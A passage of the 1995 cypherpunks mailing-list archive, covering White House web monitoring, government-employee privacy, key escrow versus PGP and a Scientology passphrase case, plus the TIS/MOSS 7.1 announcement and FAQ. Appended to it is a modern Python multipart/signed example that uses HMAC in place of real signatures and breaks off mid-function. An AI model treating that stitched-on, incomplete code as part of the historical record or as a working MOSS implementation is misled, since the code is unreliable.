the question of how high a staffer hit those pages and for what reasons is still unanswered. if it was indeed just Joe Sixpack on a presidential tour, playing with the machines, not even employed with the whitehouse, or perhaps some bored college intern, then I agree that nothing significant is going on. but it is fun to fantasize about Hillary or Bill getting an eyeful and thinking that *pornography* on the internet pales in comparison to *this* little problem!!

now, those "dissident" web sites are not as innocuous as you might think. they are not run-of-the-mill "I hate the president and republicans too" sites. one of them is the absolute master repository on the internet for all the rampant, hardcore Foster conspiracy theories talking about NSA bank spying, whitewater, etc. these are *not* something you would find in a library, or expect anyone without an interest in conspiracy theories to be reading. and from what the article suggests, the browsing was pretty thorough. it would be interesting to ask the site maintainer, something I might do.

I suspect that a lot of this Foster stuff is going to hit the media big time when the mud starts to sling during the presidential election, when it really counts. I think that someone is sitting on a lot of anti-clinton ammo. the 3rd candidate possibilities are very strong in 96, because of all the junk coating the Republicrats and Demopublicans. recall that the "october surprise" suspicions regarding Reagan really hit the media big time, and supposedly that was a highly secret intelligence operation. so I think that there is a kind of rough government accountability, it's just that it only happens about every 4 years or so and is *awfully* messy..

--Vlad Nuri

From adam at bwh.harvard.edu Wed Sep 13 14:33:33 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 13 Sep 95 14:33:33 PDT Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509131539.AA17341@cantina.verity.com> Message-ID: <9509132131.AA03432@waller.harvard.edu>

(Phill Hallam Baker's request that we respect the privacy of Government employees started this thread)

| > Sure. I'll respect their privacy as much as they, and the
| > organizations they oversee, respect mine. I'll use as the
| > representative organizations the IRS and the Social Security
| > Administration, which respects my privacy so much that they use
| > prison inmates to process paperwork.
| >
| > If I was in a nasty mood, I'd add the USPS.
| >
| > Sarcasm aside, they show no interest in other people's
| > privacy. Why should we go out of our way to do anything but show them
| > how bad the situation is?

| Oh please! Some clerk browses the internet and you don't want to respect
| their privacy because of the IRS? This makes sense how? I suppose that
| you're going to dig up information about me and spread it around the
| internet because you have issues about the company I work for?

First off, I was being somewhat sarcastic, as you might have noticed from several things, not the least of which was the phrase 'sarcasm aside.'

That said, why should I respect the privacy of government employees? There is a substantial difference between government and private companies, in that I am not compelled in any way to do business with any private company.

Adam

-- "It is seldom that liberty of any kind is lost all at once." -Hume

From unicorn at polaris.mindport.net Wed Sep 13 15:11:28 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 15:11:28 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID:

On Thu, 7 Sep 1995, Duncan Frissell wrote:

>
> On Thu, 7 Sep 1995, Black Unicorn wrote:
>
> > > Telecoms will certainly break the professional
> > > monopoly of lawyers (and other professionals).
> >
> > This I don't. How do you mean exactly?
>
> Licensing requires the ability to outlaw unlicensed transactions.
> Since the Net trumps censorship and allows consultations at a
> distance, it cracks licensing,

But won't clients insist on proper credentials in one form or another? Doesn't the practicality and accountability of a centralized authority (or several authorities) provide the best answer to this? Who is going to accept my signature promising that I did indeed get a law degree and pass the bar? I don't see how the net will eliminate the basic need for highly qualified professionals and the proof that they have credentials. Perhaps diplomas and such will be transferred into digital signatures for the institutions, but I can't see how this "cracks" any "monopoly." Perhaps the monopoly is shifted to those who have diplomas, rather than those "licensed to practice" but so what?

>
> DCF
>

From hallam at w3.org Wed Sep 13 15:19:26 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 13 Sep 95 15:19:26 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <199509132121.OAA05728@netcom23.netcom.com> Message-ID: <9509132218.AA25328@zorch.w3.org>

>I suspect that a lot of this Foster stuff is going to hit the media big
>time when the mud starts to sling during the presidential election,
>when it really counts. I think that someone is sitting on a lot
>of anti-clinton ammo. the 3rd candidate possibilities are very strong
>in 96, because of all the junk coating the Republicrats and Demopublicans.

I don't think that there will be anything on Foster, if anyone had anything they would have used it. All that has come up is that some of Foster's files marked secret were placed in a safe after he committed suicide.

What is going to happen is that a lot of the mud is going to get rebutted, on both sides. Take the Hillary Clinton Cattle deals for example, the media claim was that Hillary invested $1,000 and made $100,000. This is not true. She was asked to put up $1,000 as margin by her broker. Margin is not invested, it is simply a down payment on risk capital.
Her broker knew that Hillary could cover very much more if there was a margin call. Hillary was selling options not buying them. In the selling game you have unlimited liability but can only make a fixed profit. If you lose selling an option the money is only due at the end of the contract. So Hillary did not invest $1000, in fact she invested nothing, but she did put up her entire assets as risk capital just as a Lloyds name does in the insurance market.

The key question is whether the kooks win and the net just degenerates into conspiracy theories and so nobody takes any notice of really heinous stuff or whether the net injects some facts into the political debate. The net can be used for both allegations and rebuttal. That type of environment would constitute a genuine information democracy.

>the Whitehouse web hits are potentially interesting. I agree they
>don't imply any "dissident web monitoring program". the question of
>how high a staffer hit those pages and for what reasons is still
>unanswered.

High ups have better things to do with their time than watch conspiracy theorists blather on. Underlings are not net.enabled. If you think that's bad, check out the Congress, they have a limit on the number of Internet enabled staffers per senator and congressbeing. I keep trying to get the message across about T3 lines but they don't seem to get the message. Ever wondered why these poor folks can't use email for their organisations..?

If you are wondering about the cypherpunkness of all this I think that these guys should all be using PGP. I'm very careful to give them the url for the European distribution site however :-)

Adam writes:

> That said, why should I respect the privacy of government
>employees? There is a substantial difference between government and
>private companies, in that I am not compelled in any way to do
>business with any private company.

Like I have a choice of going to Commonwealth gas or not having any lights in the apartment...
Phill H-B

Not speaking for anyone else.

From hfinney at shell.portal.com Wed Sep 13 15:28:19 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 13 Sep 95 15:28:19 PDT Subject: Can GAK be made "not interoperable" with PGP? Message-ID: <199509132227.PAA03114@jobe.shell.portal.com>

From: Duncan Frissell
> At 10:26 AM 9/13/95 -0700, Timothy C. May wrote:
>
> >But is this even possible, to make a GAK system "not interoperable" with,
> >say, PGP?
> >
> >Unless the GAK system has some sort of entropy analyzer, and can recognize
> >high-entropy sources which it presumes to be encrypted data (*), one can of
> >course PGP-encrypt a text file and then GAK the resulting file.
>
> I took it to mean that they were saying that an approved program on one end
> of a communication exchange could not exchange encrypted messages or
> establish an encrypted session of some kind with an unapproved program on
> the other end. Not trying to outlaw superencryption (PGP on both ends using
> a GAKed channel) but GAK on one end working with an unapproved system on the
> other end. A ringer GAK-work-alike that would defeat the intent of GAK.

Yes, I think this was the idea of the original "software key escrow" proposal, from TIS as I recall. The sender would encode the session key with a government public key but there was some trick by which the receiver would verify that the session key was in fact encoded correctly and refuse to operate if it was wrong. So any attempt to corrupt or remove the LEAF would be detected if you were talking to a compliant receiver.

That is part of why Matt Blaze's Clipper attacks were so significant, because they went to the heart of this requirement. It was always clear that you could superencrypt with Clipper, but Matt found a way in which you could send a LEAF which would be accepted by a regular Clipper phone but which had bogus data for law enforcement. So this defeated the requirement of not interoperating with rogues.
Hal

From msew+ at andrew.cmu.edu Wed Sep 13 15:53:22 1995 From: msew+ at andrew.cmu.edu (Martin C Sweitzer) Date: Wed, 13 Sep 95 15:53:22 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <9509131434.AA23717@toad.com> Message-ID: <8kJq22C00awF0=Na15@andrew.cmu.edu>

Excerpts from cypherpunks: 13-Sep-95 CYPHERPUNK considered harmful. by "Peter Trei"@process.com
> We call ourselves 'cypherpunks'. While this is derived from the SF
> term 'cyberpunk', consider the image we are creating for ourselves:
>
> A 'punk' is a marginalized young adult, one who rejects the norms
> of his or her society, and takes delight in irking those around him with
> his or her rejection. The older of us will think of James Dean in 'Rebel
> Without a Cause', or Brando in 'The Wild One'. Later, you get images
> such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> other icons of the 'punk rock' movement.

Never EVER judge a book by its cover. People that do usually end up being Joe Sixpacks. And by being a Joe Sixpack you don't have that much power in today's society.

Martin S

From patrick at Verity.COM Wed Sep 13 15:56:36 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 13 Sep 95 15:56:36 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509132252.AA20787@cantina.verity.com>

>
> | Oh please! Some clerk browses the internet and you don't want to respect
> | their privacy because of the IRS? This makes sense how? I suppose that
> | you're going to dig up information about me and spread it around the
> | internet because you have issues about the company I work for?
>
> First off, I was being somewhat sarcastic, as you might have
> noticed from several things, not the least of which was the phrase
> 'sarcasm aside.'
>
> That said, why should I respect the privacy of government
> employees?
> There is a substantial difference between government and
> private companies, in that I am not compelled in any way to do
> business with any private company.
>
> Adam

Someone is making you let users at government sites browse your website?

Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
| (\ |
| Patrick J. Horgan Verity Inc. \\ Have |
| patrick at verity.com 1550 Plymouth Street \\ _ Sword |
| Phone : (415)960-7600 Mountain View \\/ Will |
| FAX : (415)960-7750 California 94303 _/\\ Travel |
\___________________________________________________________\)__________/

From cme at acm.org Wed Sep 13 16:09:12 1995 From: cme at acm.org (cme at acm.org) Date: Wed, 13 Sep 95 16:09:12 PDT Subject: CAGK rationale (was: Re: GAK/weak crypto rationale?) In-Reply-To: <199509132001.NAA02021@comsec.com> Message-ID: <9509132212.AA28200@tis.com>

>Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT)
>From: Brian Davis
> In our district, we
>managed to convict almost 20 people in an investigation of the state
>legislature, including the now-former Speaker of the House and
> 6 other
>legislators. Bribing lobbyists took hits, etc.
>
>Particularly effective were the court-approved video and audio tapes of
>the Speaker taking a bribe in exchange for certain action on legislation
>and responding to the bribing party: "Well bless your heart."
>That has become the office's mantra.

Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with all gov't officials forced to use keys held by various newspapers and other watchdog agencies....

The video and audio bugs aren't part of the wiretap process so they don't apply here.

- Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
| ``Officer, officer, arrest that man!
He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From unicorn at polaris.mindport.net Wed Sep 13 16:20:57 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 16:20:57 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: Message-ID: On Fri, 8 Sep 1995, Alan Westrope wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Tonight's local news included an interesting blurb about this case. > The judge refused to order Wollersheim to disclose his passphrase, > since the encrypted material comprised names of Co$ critics > who could then be targeted by the Church. And the secret (and > copyright!) $criptures were read in court and excerpts broadcast > on the news, "close-captioned for the hearing-impaired." Anyone have the name of this action, the court it was in or the name of the judge? I would very much like to see a transcript of his order. > > All the entertaining stuff some of us have been reading on the > net was there: aliens transported to earth, volcanoes h-bombed, > thetans...I laughed my ass off. A bigtime win for PGP and encryption > generally, and a major PR debacle for the $cienos. > > Kute Korrespondences Koda: > > Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers. > I was cleaning out some paperwork and disk file archives recently, > and noticed that the ViaCrypt and Austin Code Works subpoenas were > dated Sept. 9, 1993. Grady Ward of ACW has, of course, been a > major Co$ antagonist, making good use of PGP and the Cypherpunks > remailers. The old message I found detailing these subpoenas was > from this list's sometime visionary, L. Detweiler. 
> > Alan Westrope > __________/|-, > (_) \|-' 2.6.2 public key: finger / servers > PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If > GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd > WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT > Mkgv7cSClDM= > =Nuz5 > -----END PGP SIGNATURE----- > From rsalz at osf.org Wed Sep 13 16:36:28 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 13 Sep 95 16:36:28 PDT Subject: MOSS [IETF privacy-enhanced mail, modified for MIME] now available Message-ID: <9509132335.AA05053@sulphur.osf.org> >From pem-dev-request at neptune.tis.com Wed Sep 13 19:27:35 1995 Message-Id: <9509132011.AA19261 at tis.com> Reply-To: James M Galvin To: "MOSS.Announce.List":;, tis.com at TIS.COM Subject: ANNOUNCE: TIS/MOSS Version 7.1 Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0" Content-Id: <2977.811023088.1 at tis.com> Date: Wed, 13 Sep 1995 16:11:35 -0400 ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.2 at tis.com> Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference implementation of MIME Object Security Services (MOSS). TIS/MOSS is a security toolkit that provides digital signature and encryption services for MIME objects. TIS/MOSS includes the "glue" necessary for integration with Version 6.8.3 of the Rand MH Message Handling System, in addition to generic Bourne shell scripts that make it possible to use it with email user agents supporting UNIX shell escapes. In order to foster acceptance of MOSS and provide the community with a usable, working version of this technology, TIS/MOSS is being made available for broad use on the following basis. 
TIS/MOSS is distributed in source code form, with all modules written in the C programming language. It runs on many UNIX derived platforms. It includes a DOS compilation directive that facilitates its port to DOS/WINDOWS.

TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI. TIS/MOSS makes use of undocumented features of RSAREF. RSADSI has given permission for users of TIS/MOSS to use these features, subject to the terms and conditions of both the TIS/MOSS and RSAREF licenses, as distributed with each software package.

TIS/MOSS is a product of Trusted Information Systems, Inc. It may be used by organizations and users for exchanging MOSS email messages, subject to the terms and conditions of its license.

Enclosed below is the MOSS Frequently Asked Questions, which includes instructions on how to retrieve the software.

TIS/MOSS is export controlled by the U.S. Government. As a result it is only available to U.S. and Canadian sites and individuals. Please see the FAQ for more information.

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.3 at tis.com>
Content-Description: TIS/MOSS FAQ

TIS/MOSS Frequently Asked Questions
Last Updated July 1995
Send questions and comments to tismoss-support at tis.com

Questions answered:
1) What is MIME Object Security Services (MOSS)?
2) What is MIME?
3) How does MOSS compare to PGP and PEM?
4) Where is the MOSS standard defined?
5) Are there implementations of MOSS available?
6) How do I get TIS/MOSS?
7) Why is TIS/MOSS only available in the US and Canada?
8) Are special privileges (e.g., root access) required to install TIS/MOSS?
9) What about integrating TIS/MOSS into email user agents?
10) What about DOS and other non-UNIX platforms?
11) Is there a forum for MOSS users and developers?
12) What about certificates?
13) What is the Internet Certification hierarchy?
14) What if I have questions or problems with TIS/MOSS?

* means that this entry has been recently updated.
+ means that this entry has been added recently.

1 Q: What is MIME Object Security Services (MOSS)?
A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed Internet Standard for adding security services to Multi-purpose Internet Mail Extensions (MIME). It uses the cryptographic techniques of digital signature and encryption to provide origin authentication, integrity, and confidentiality to MIME objects. Users of MOSS can know who originated a message, that the message has not been changed en route, and that the message was kept secret from everyone except the intended recipients. MOSS depends on the existence of public/private key pairs to support its security services. Users must exchange public keys with those other users with whom they wish to exchange MOSS email. This may be accomplished manually, via mechanisms available in the protocol, via X.509 certificates, or any other suitable mechanism.

2 Q: What is MIME?
A: MIME is an Internet Standard (RFC 1521) that defines the format of email message bodies to allow multi-part textual and non-textual message bodies to be represented and exchanged without loss of information. MIME does for message bodies what RFC822 does for message headers.

3 Q: How does MOSS compare to PGP and PEM?
A: PGP can provide the same services but since it is not integrated with MIME the interpretation of the protected content is necessarily user controlled. Note, however, that MIME can carry a PGP object. MOSS is a PEM derivative. It integrates the security services of PEM with MIME, taking advantage of the extensive structuring and formatting facilities of MIME, limited versions of which are necessarily an integral part of the PEM specifications.

4 Q: Where is the MOSS standard defined?
A: There is a Proposed Standard published as an RFC that specifies MOSS. This document may be found in your favorite RFC repository. Details on obtaining RFCs via FTP or EMAIL may be obtained by sending an EMAIL message to "rfc-info at ISI.EDU" with the message body "help: ways_to_get_rfcs". For example:
To: rfc-info at ISI.EDU
Subject: getting rfcs
help: ways_to_get_rfcs

5 Q: Are there implementations of MOSS available?
A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has released a reference implementation of MOSS (TIS/MOSS) to the Internet community. TIS/MOSS is a UNIX-based implementation that is easily integrated with email user agents. The source code is openly available in the United States and Canada for non-commercial use. The current version of TIS/MOSS is 7.1. Vendors interested in including TIS/MOSS in their products or integrating it with their services should contact Trusted Information Systems about licensing Trusted Mail (tm) by sending email to tismoss-support at tis.com.

6 Q: How do I get TIS/MOSS?
A: TIS/MOSS is available via anonymous ftp in the United States and Canada to US and Canadian citizens and people with a US "green card." To retrieve TIS/MOSS please FTP to host: ftp.tis.com login: anonymous and retrieve the files pub/MOSS/README pub/MOSS/LICENSE pub/MOSS/BUGS The README file contains further instructions.

7 Q: Why is TIS/MOSS only available in the US and Canada?
A: The export from the United States of the cryptography used in TIS/MOSS is controlled by the United States government.

8 Q: Are special privileges (e.g., root access) required to install TIS/MOSS?
A: No.

9 Q: What about integrating TIS/MOSS into email user agents?
A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate it with the Rand MH Message Handling System version 6.8.3. It also includes generic scripts that make the services accessible to any UNIX application that supports shell escapes. If you integrate TIS/MOSS with a popular email user agent, we would be happy to make it available to others.

10 Q: What about DOS and other non-UNIX platforms?
A: TIS/MOSS has been ported to DOS and includes a DOS compiler option that may be set to facilitate its installation in DOS environments. It has also been ported to Macintosh although it does not yet include a MAC compiler option. If you port TIS/MOSS to other platforms, we would be happy to make the changes available to others.

11 Q: Is there a forum for MOSS users and developers?
A: Yes, there is an email list for users of TIS/MOSS called "tismoss-users at tis.com". To get added to the list send a message to "tismoss-users-request at tis.com". There is an email list for implementors and discussions of the MOSS specifications called "pem-dev at tis.com". This list originated with the PEM protocol, from which MOSS is derived. To get added to the list send a message to "pem-dev-request at tis.com".

12 Q: What about certificates?
A: TIS/MOSS supports the use of X.509 certificates including creation, validation, certificate revocation lists, distribution, and destruction. Users may embody their public key in a certificate and may participate in the Internet certification hierarchy or some other private hierarchy. TIS/MOSS neither requires nor enforces any certification hierarchy policy.

13 Q: What is the Internet Certification hierarchy?
A: The Internet Certification hierarchy is defined by RFC1422. It is a tree structured hierarchy of certificates with a single, global root called the Internet PCA Registration Authority (IPRA). The IPRA issues certificates to Policy Certification Authorities (PCAs) who issue certificates to Certification Authorities (CAs) who may issue certificates to users or subordinate CAs. Identities are based on distinguished names and there are restrictions on their form and content.
For more information on becoming a PCA see the IPRA WWW page at: http://bs.mit.edu:8001/ipra.html or contact the IPRA at: ipra-info at isoc.org For more information on becoming a CA under the TIS PCA contact: tispca-info at tis.com 14 Q: What if I have questions about or problems with TIS/MOSS? A: Send them to "tismoss-support at tis.com". ------- =_aaaaaaaaaa0 Content-Type: multipart/signed; protocol="application/moss-signature"; micalg="md5"; boundary="----- =_aaaaaaaaaa1" ------- =_aaaaaaaaaa1 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.5 at tis.com> Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference implementation of MIME Object Security Services (MOSS). TIS/MOSS is a security toolkit that provides digital signature and encryption services for MIME objects. TIS/MOSS includes the "glue" necessary for integration with Version 6.8.3 of the Rand MH Message Handling System, in addition to generic Bourne shell scripts that make it possible to use it with email user agents supporting UNIX shell escapes. In order to foster acceptance of MOSS and provide the community with a usable, working version of this technology, TIS/MOSS is being made available for broad use on the following basis. TIS/MOSS is distributed in source code form, with all modules written in the C programming language. It runs on many UNIX derived platforms. It includes a DOS compilation directive that facilitates its port to DOS/WINDOWS. TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI. TIS/MOSS makes use of undocumented features of RSAREF. RSADSI has given permission for users of TIS/MOSS to use these features, subject to the terms and conditions of both the TIS/MOSS and RSAREF licenses, as distributed with each software package. TIS/MOSS is a product of Trusted Information Systems, Inc. 
It may be used by organizations and users for exchanging MOSS email messages, subject to the terms and conditions of its license. Enclosed below is the MOSS Frequently Asked Questions, which includes instructions on how to retrieve the software. TIS/MOSS is export controlled by the U.S. Government. As a result it is only available to U.S. and Canadian sites and individuals. Please see the FAQ for more information. ------- =_aaaaaaaaaa1 Content-Type: application/moss-signature Content-ID: <2977.811023088.4 at tis.com> Content-Transfer-Encoding: quoted-printable Version: 5 Originator-ID: PK,MHkwCgYEVQgBAQICAwADawAwaAJhAMAHQ45ywA357G4fqQ61aoC1fO6B= ekJmG4475mJkwGIUxvDkwuxe/EFdPkXDGBxzdGrW1iuh5K8kl8KRGJ9wh1HU4TrghGdhn0Lw8g= G67Dmb5cBhY9DGwq0CDnrpKZV3cQIDAQAB,EN,2,galvin at tis.com MIC-Info: RSA-MD5,RSA,jZjz1ope/QCf2IwPfkXfB+0bNJsFqJny+xVqjyFaW6QAY0Oy4dru= PxTgYleEFG2qQBP6rbNiucG7g254ClV6hUMG6ksd+qFioFvxqsJ15WylN7Addo/QCzknzhRo45= 6l ------- =_aaaaaaaaaa1-- ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: <2977.811023088.6 at tis.com> Content-Description: TIS/MOSS FAQ TIS/MOSS Frequently Asked Questions Last Updated July 1995 Send questions and comments to tismoss-support at tis.com Questions answered: 1) What is MIME Object Security Services (MOSS)? 2) What is MIME? 3) How does MOSS compare to PGP and PEM? 4) Where is the MOSS standard defined? 5) Are there implementations of MOSS available? 6) How do I get TIS/MOSS? 7) Why is TIS/MOSS only available in the US and Canada? 8) Are special privileges (e.g., root access) required to install TIS/MOSS? 9) What about integrating TIS/MOSS into email user agents? 10) What about DOS and other non-UNIX platforms? 11) Is there a forum for MOSS users and developers? 12) What about certificates? 13) What is the Internet Certification hierarchy? 14) What if I have questions or problems with TIS/MOSS? * means that this entry has been recently updated. + means that this entry has been added recently. 
1 Q: What is MIME Object Security Services (MOSS)?

A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed Internet Standard for adding security services to Multipurpose Internet Mail Extensions (MIME). It uses the cryptographic techniques of digital signature and encryption to provide origin authentication, integrity, and confidentiality to MIME objects. Users of MOSS can know who originated a message, that the message has not been changed en route, and that the message was kept secret from everyone except the intended recipients. MOSS depends on the existence of public/private key pairs to support its security services. Users must exchange public keys with those other users with whom they wish to exchange MOSS email. This may be accomplished manually, via mechanisms available in the protocol, via X.509 certificates, or any other suitable mechanism.

2 Q: What is MIME?

A: MIME is an Internet Standard (RFC 1521) that defines the format of email message bodies to allow multi-part textual and non-textual message bodies to be represented and exchanged without loss of information. MIME does for message bodies what RFC822 does for message headers.

3 Q: How does MOSS compare to PGP and PEM?

A: PGP can provide the same services but since it is not integrated with MIME the interpretation of the protected content is necessarily user controlled. Note, however, that MIME can carry a PGP object. MOSS is a PEM derivative. It integrates the security services of PEM with MIME, taking advantage of the extensive structuring and formatting facilities of MIME, limited versions of which are necessarily an integral part of the PEM specifications.

4 Q: Where is the MOSS standard defined?

A: There is a Proposed Standard published as an RFC that specifies MOSS. This document may be found in your favorite RFC repository. Details on obtaining RFCs via FTP or EMAIL may be obtained by sending an EMAIL message to "rfc-info at ISI.EDU" with the message body "help: ways_to_get_rfcs". For example:

To: rfc-info at ISI.EDU
Subject: getting rfcs

help: ways_to_get_rfcs

5 Q: Are there implementations of MOSS available?

A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has released a reference implementation of MOSS (TIS/MOSS) to the Internet community. TIS/MOSS is a UNIX-based implementation that is easily integrated with email user agents. The source code is openly available in the United States and Canada for non-commercial use. The current version of TIS/MOSS is 7.1. Vendors interested in including TIS/MOSS in their products or integrating it with their services should contact Trusted Information Systems about licensing Trusted Mail (tm) by sending email to tismoss-support at tis.com.

6 Q: How do I get TIS/MOSS?

A: TIS/MOSS is available via anonymous ftp in the United States and Canada to US and Canadian citizens and people with a US "green card." To retrieve TIS/MOSS please FTP to
host: ftp.tis.com
login: anonymous
and retrieve the files
pub/MOSS/README
pub/MOSS/LICENSE
pub/MOSS/BUGS
The README file contains further instructions.

7 Q: Why is TIS/MOSS only available in the US and Canada?

A: The export from the United States of the cryptography used in TIS/MOSS is controlled by the United States government.

8 Q: Are special privileges (e.g., root access) required to install TIS/MOSS?

A: No.

9 Q: What about integrating TIS/MOSS into email user agents?

A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate it with the Rand MH Message Handling System version 6.8.3. It also includes generic scripts that make the services accessible to any UNIX application that supports shell escapes. If you integrate TIS/MOSS with a popular email user agent, we would be happy to make it available to others.

10 Q: What about DOS and other non-UNIX platforms?

A: TIS/MOSS has been ported to DOS and includes a DOS compiler option that may be set to facilitate its installation in DOS environments. It has also been ported to Macintosh although it does not yet include a MAC compiler option. If you port TIS/MOSS to other platforms, we would be happy to make the changes available to others.

11 Q: Is there a forum for MOSS users and developers?

A: Yes, there is an email list for users of TIS/MOSS called "tismoss-users at tis.com". To get added to the list send a message to "tismoss-users-request at tis.com". There is an email list for implementors and discussions of the MOSS specifications called "pem-dev at tis.com". This list originated with the PEM protocol, from which MOSS is derived. To get added to the list send a message to "pem-dev-request at tis.com".

12 Q: What about certificates?

A: TIS/MOSS supports the use of X.509 certificates including creation, validation, certificate revocation lists, distribution, and destruction. Users may embody their public key in a certificate and may participate in the Internet certification hierarchy or some other private hierarchy. TIS/MOSS neither requires nor enforces any certification hierarchy policy.

13 Q: What is the Internet Certification hierarchy?

A: The Internet Certification hierarchy is defined by RFC1422. It is a tree structured hierarchy of certificates with a single, global root called the Internet PCA Registration Authority (IPRA). The IPRA issues certificates to Policy Certification Authorities (PCAs) who issue certificates to Certification Authorities (CAs) who may issue certificates to users or subordinate CAs. Identities are based on distinguished names and there are restrictions on their form and content. For more information on becoming a PCA see the IPRA WWW page at: http://bs.mit.edu:8001/ipra.html or contact the IPRA at: ipra-info at isoc.org For more information on becoming a CA under the TIS PCA contact: tispca-info at tis.com

14 Q: What if I have questions about or problems with TIS/MOSS?

A: Send them to "tismoss-support at tis.com".
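How the signing service the FAQ describes fits into a MIME object, as an added example that is not part of the FAQ or of TIS/MOSS: the protected body part is put into MIME canonical form (its own headers, a blank line, then the body, all with CRLF line endings), the signature is computed over exactly those bytes and carried as a second body part of a multipart/signed container, and the verifier checks the bytes as transmitted rather than a re-serialized copy. Two assumptions are made here: HMAC-SHA256 under a shared key stands in for the public-key signature MOSS actually uses, because the Python standard library has no signature primitive, and the media type name application/moss-signature, the micalg label and the boundary string are illustrative choices, not taken from the FAQ.

```python
"""Added example (not TIS/MOSS code): a multipart/signed MIME object with a
detached signature over the canonical form of the protected body part.
HMAC-SHA256 under a shared key is a stand-in for MOSS's public-key signature."""
import hashlib
import hmac
from email import message_from_bytes, policy

CRLF = b"\r\n"
SIG_TYPE = "application/moss-signature"   # assumed media type for the signature part
BOUNDARY = "=_moss_example"               # fixed here so output is deterministic; a real
                                          # implementation must pick one absent from the content


def canonical(part_headers: dict, body_text: str) -> bytes:
    """MIME canonical form of one body part: headers, blank line, body, CRLF
    line endings.  The signature covers exactly these bytes, headers included,
    so the recipient's view of the part (its type, charset) is protected too.
    Only 7-bit ASCII is accepted; MOSS would apply a transfer encoding first."""
    lines = [f"{k}: {v}" for k, v in part_headers.items()] + [""]
    lines += body_text.replace("\r\n", "\n").split("\n")
    return CRLF.join(line.encode("ascii") for line in lines)


def sign(data: bytes, key: bytes) -> str:
    # Stand-in for the private-key operation (see note above).
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def build_signed(body_text: str, key: bytes) -> bytes:
    """Build the multipart/signed container: body part, then signature part."""
    part = canonical({"Content-Type": "text/plain; charset=us-ascii"}, body_text)
    sig_part = canonical({"Content-Type": SIG_TYPE}, sign(part, key))
    outer_headers = (
        "MIME-Version: 1.0",
        f'Content-Type: multipart/signed; protocol="{SIG_TYPE}"; '
        f'micalg="sha256"; boundary="{BOUNDARY}"',
    )
    delim = b"--" + BOUNDARY.encode("ascii")
    return CRLF.join([
        *(h.encode("ascii") for h in outer_headers),
        b"",
        delim, part,          # protected body part, verbatim canonical bytes
        delim, sig_part,      # detached signature over those bytes
        delim + b"--", b"",   # closing delimiter
    ])


def verify_signed(raw: bytes, key: bytes) -> bool:
    """Verify over the transmitted bytes.  The email parser is used only to
    read the outer Content-Type; the body part is cut out of `raw` itself,
    because re-serializing a parsed part can change the bytes that were signed."""
    msg = message_from_bytes(raw, policy=policy.SMTP)
    if msg.get_content_type() != "multipart/signed":
        return False
    if msg.get_param("protocol") != SIG_TYPE or msg.get_param("micalg") != "sha256":
        return False
    boundary = msg.get_boundary()
    if not boundary:
        return False
    pieces = raw.split(b"--" + boundary.encode("ascii"))
    # pieces[0] is the outer header block; the last piece is the "--" of the
    # closing delimiter.  Exactly two parts must sit between them.
    if len(pieces) != 4 or not pieces[-1].startswith(b"--"):
        return False
    # Each piece starts with the CRLF that ends its delimiter line and ends with
    # the CRLF that belongs to the next delimiter (RFC 2046 rule); drop both.
    body_part, sig_part = pieces[1][2:-2], pieces[2][2:-2]
    claimed = sig_part.split(CRLF + CRLF, 1)[1].decode("ascii").strip()
    return hmac.compare_digest(sign(body_part, key), claimed)


def demo() -> tuple:
    """Returns (genuine verifies, body tamper detected, header tamper detected)."""
    key = b"example shared key"                       # constructed for the demo
    raw = build_signed("Meet at 7pm.\n", key)
    body_tampered = raw.replace(b"7pm", b"9pm")        # change the text in transit
    header_tampered = raw.replace(b"charset=us-ascii", b"charset=utf-8")
    return (verify_signed(raw, key),
            verify_signed(body_tampered, key),
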